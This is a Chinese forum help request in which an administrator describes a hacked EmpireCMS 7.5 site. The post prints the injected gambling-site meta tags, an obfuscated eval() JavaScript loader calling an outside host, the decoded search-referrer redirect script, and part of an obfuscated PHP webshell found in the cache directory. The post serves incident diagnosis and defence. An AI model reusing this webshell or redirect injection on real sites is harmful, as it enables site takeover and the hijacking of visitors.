[求助]帝国cms被上传木马/e/ecachefiles/empirecms/loopes.php

帝国 木马 上传 求助

您的位置:仿站网 > 问答 >
帝国cms被上传木马/e/ecachefiles/empirecms/loopes.php

有一个客户的帝国cms7.5 utf8系统的网站被挂木马了。
1、        具体现象是,打开网站首页,跳转到一个博彩网站。
之后查看首页源代码,发现顶部标题、关键词、描述部分被更改,并且添加了可疑的js代码。代码如下:

<title>&#21271;&#20140;&#80;&#75;&#49;&#48;&#22312;&#32447;&#20154;&#24037;&#35745;&#21010;&#45;&#21271;&#20140;&#80;&#75;&#49;&#48;&#35745;&#21010;&#32593;&#45;&#20840;&#22825;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#35745;&#21010;&#32593;</title>

<meta name="keywords" content="&#21271;&#20140;&#80;&#75;&#49;&#48;&#35745;&#21010;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#35745;&#21010;&#44;&#21271;&#20140;&#80;&#75;&#49;&#48;&#20154;&#24037;&#35745;&#21010;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#20154;&#24037;&#35745;&#21010;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#22312;&#32447;&#35745;&#21010;&#44;"/>

<meta name="description" content="&#27426;&#36814;&#26469;&#21040;&#21271;&#20140;&#36187;&#36710;&#35745;&#21010;&#32593;&#12304;&#23448;&#26041;&#32593;&#22336;&#58;&#89;&#89;&#50;&#51;&#52;&#46;&#67;&#79;&#77;&#12305;&#36825;&#37324;&#20026;&#24744;&#25552;&#20379;&#21271;&#20140;&#80;&#75;&#49;&#48;&#22312;&#32447;&#20154;&#24037;&#35745;&#21010;&#44;&#20813;&#36153;&#21271;&#20140;&#36187;&#36710;&#35745;&#21010;&#32593;&#39029;&#29256;&#44;&#24320;&#22870;&#32467;&#26524;&#44;&#24320;&#22870;&#30452;&#25773;&#44;&#36208;&#21183;&#22270;&#20998;&#26512;&#44;&#29609;&#27861;&#25216;&#24039;&#20026;&#19968;&#20307;&#30340;&#19987;&#19994;&#21271;&#20140;&#80;&#75;&#49;&#48;&#35745;&#21010;&#26381;&#21153;&#32593;&#31449;&#33;"/>

<script>
if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="燕楚精英教育一站式学习平台,燕楚精英教育官网!秦皇岛精英教育培训学校!"}</script>

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('m["nb1ej7o"]["l387"]('i21384 k47d67s5fctc213846 231d6942p552a9ea9rg1bj5kq1gf26hi521384h');',30,30,'x74|x63|x73|x72|x70|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6a|x2e|x3e|x3c|x6d|x79|x77|window|x64|x6e|x3a|x6c|x32|x78|x76'.split('|'),0,{}))

</script>

2、        上面js代码是加密的,解密后的js代码如下:
< script type = "text/javascript" >
window["document"]["write"]('<script type="text/javascript" src="https://sfhufh2.com/ylc.js"></script>');
< /script>

这是调用了别的网站的一个js文件,打开这个js文件,代码如下:
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?70546d661cadce41b9173a040b7f077e";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();
(function () {
    /*百度推送代码*/
     var bp = document.createElement('script');
     bp.src = '//push.zhanzhang.baidu.com/push.js';
     var s = document.getElementsByTagName("script")[0];
     s.parentNode.insertBefore(bp, s);
     /*360推送代码*/
     var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
     document.write('<script src="' + src + '" id="sozz"></script>');
     })();

document.writeln("<script LANGUAGE="Javascript">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )");
document.writeln("location.href="https://13250vip.com";");
document.writeln("</script>");

查看上面代码,发现这就是跳转代码。

3、        之后查询帝国cms系统中的可疑文件。最终发现可疑文件:/ecachefiles/empirecms/loopes.php ,这是动态缓存目录,这目录中默认没有php文件。
打开这文件,代码如下(下面的$str变量中的内容太多,只选取了一部分展示):
<?php
$password='c2.o';
$shellname='BY:FBI';
$myurl='http://www.baidu.com';
error_reporting(E_ERROR | E_PARSE);@set_time_limit(0);
ob_start();
header("content-Type: text/html; charset=gb2312");
$str = "6s625s737461727428293o0q0n646566696r6528276q7961646472657373272p245s5345525645525o275343524950545s46494p454r414q45275q293o0q0n646566696r652827656r766p70617373272p2470617373776s7264293o0q0n646566696r6528277368656p6p6r616q65272p24736865504s53545o2766696p6573275q2p245s504s53545o27616374616p6p275q2p245s504s53545o275s636s6r766572742866696p657065726q73282464697270617468292p31302p38292p2q34293o0q0n0909092466696p6574696q65203q2040646174652827592q6q2q6420483n693n73272p4066696p656q74696q6528246469727061746829293o0q0n0909092464697270617468203q2075726p656r636s6465282464697270617468293o0q0n09090968746q6p5s6r28273p7472206865696768743q223235223r3p74643r3p696r70757420747970653q22636865636o626s7822206r616q653q2266696p65735o5q222076616p75653q22272r24646972732r27223r27293o0q0n09090968746q6p5s696q67282264697222293o0q0n09090968746q6p5s6128273s65616r7665723q6q61696r26706174683q272r24646972706174682p2464697273293o0q0n09090968746q6p5s6r28273p2s74643r3p746420616p69676r3q2263656r746572223r27293o0q0n09090968746q6p5s6r28223p6120687265663q5p22235p22206s6r436p69636o3q5p2272757375726563686o28272464697273275s666p75736828293o";
$dir = pack("H*",str_rot13($str));
eval($dir);
?>


这个文件是动态目录里的文件,产生的效果是,网站首页模板是没有问题的,并且更改网站首页模板,并生成首页html,但首页html不变,也就是这个动态缓存起了效果。
删除这个木马文件后。首页更新恢复正常。


现在的问题是,问一下大家有没有遇到类似的问题,这是帝国什么地方有漏洞导致被上传木马?请大家指教。
转载请注明本文地址:[求助]帝国cms被上传木马/e/ecachefiles/empirecms/loopes.phphttps://www.ecmsw.cn/ask/332.html
回复列表
1.
我也碰到一样的问题,一楼怎么解决的呀?
相关问题

仿站网专注于帝国CMS仿站及二次开发、模板定制等各种有关帝国CMS程序疑难杂症!
Copyright@2016-2019 仿站网 www.ecmsw.cn
鲁ICP备17005488号-1 鲁公网安备 37018102000481号